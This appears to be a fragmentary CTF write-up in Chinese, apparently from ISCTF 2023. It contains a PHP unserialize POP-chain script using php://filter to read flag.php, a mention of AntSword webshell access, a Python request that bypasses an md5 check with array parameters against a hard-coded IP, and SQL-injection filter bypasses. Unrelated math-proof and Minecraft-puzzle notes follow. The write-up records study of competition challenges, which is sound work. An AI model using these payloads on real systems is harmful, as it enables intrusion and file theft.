圣杯
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
class artifact{
public $excalibuer;
public $arrow;
}
class prepare{
public $release;
}
class saber{
public $weapon;
}
class summon{
public $Saber;
public $Rider;
}
$a = new summon();
$a->Saber = new artifact();
$a->Saber->excalibuer = new prepare();
$a->Saber->arrow = $sb;
$a->Saber->excalibuer->release = new saber();
$a->Saber->excalibuer->release->weapon = "php://filter/read=convert.base64-encode/resource=flag.php";
echo urlencode(serialize($a));
``
- `where is`
post传参,蚁剑连接
flag1:ISCTF{19bc
flag2:86f6-33ee-
start.sh!/bin/sh sed -i “s//${FLAG:0:10}/“ /var/www/localhost/htdocs/flag.php echo ${FLAG:10:10} > /flag2 export FLAG3=${FLAG:20} FLAG3=${FLAG:20} export FLAG=”flag” FLAG=”flag” httpd -D FOREGROUND
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
- 绕过
数组绕过md5
hongmeng[]=1&shennong[]=2
数组绕过
zhurong[]=1
[偷脚本](https://blog.csdn.net/qq_46918279/article/details/120667769)
```py
import requests
url="http://43.249.195.138:20583/?hongmeng[]=1&shennong[]=2&zhurong[]=1"
data={
'pan_gu':'very'*250000+'2023ISCTF'
}
r=requests.post(url,data=data)
print(r.text)easy_website
盲注
and or select双写过滤
tab绕过括号select count有一个表users,有2个字段
字段1 user
字段2 passwordpassword32位是md5加密
用户名分别是 admin,d
sql
单引号注入,过滤了or可以双写绕过,过滤空格用/ /绕过
ununionion/ /selselectect
6530b62ef39cf1e8f7570adf75f69f4be9d
0123456789abcdef
0123456789abcdef
6250b64ef59cf3e8f7270adf72f69f1be9d
0123456789abcdef
0123456789abcdef
white
zo23n
black
f5s7e
设 $b=a+c,c>0$
则
令 $t=c/a$
令 $f(t)=ln(1+t)- 2t/(2+t)$
所以 $f(t)$ 是增函数
而 $f(0)=0$ 对所有的 $t>0$ 都有 $f(t)>0$
所以 $lnb-lna>2(b-a)/(a+b)$
MC中对应房子颜色方块的笛卡尔坐标系
(120,11) (68,4) (88,13) (80,8)
109 64 75 72
M @ K H
房子坐标
(48,-34) (49,-34) (68,-34) (88,-34)
82 83 102 122
R S f z
以房子为原点修正每个块的坐标
(72,45) (27,38) (20,47) (8,42)
117 65 87 50
u A W 2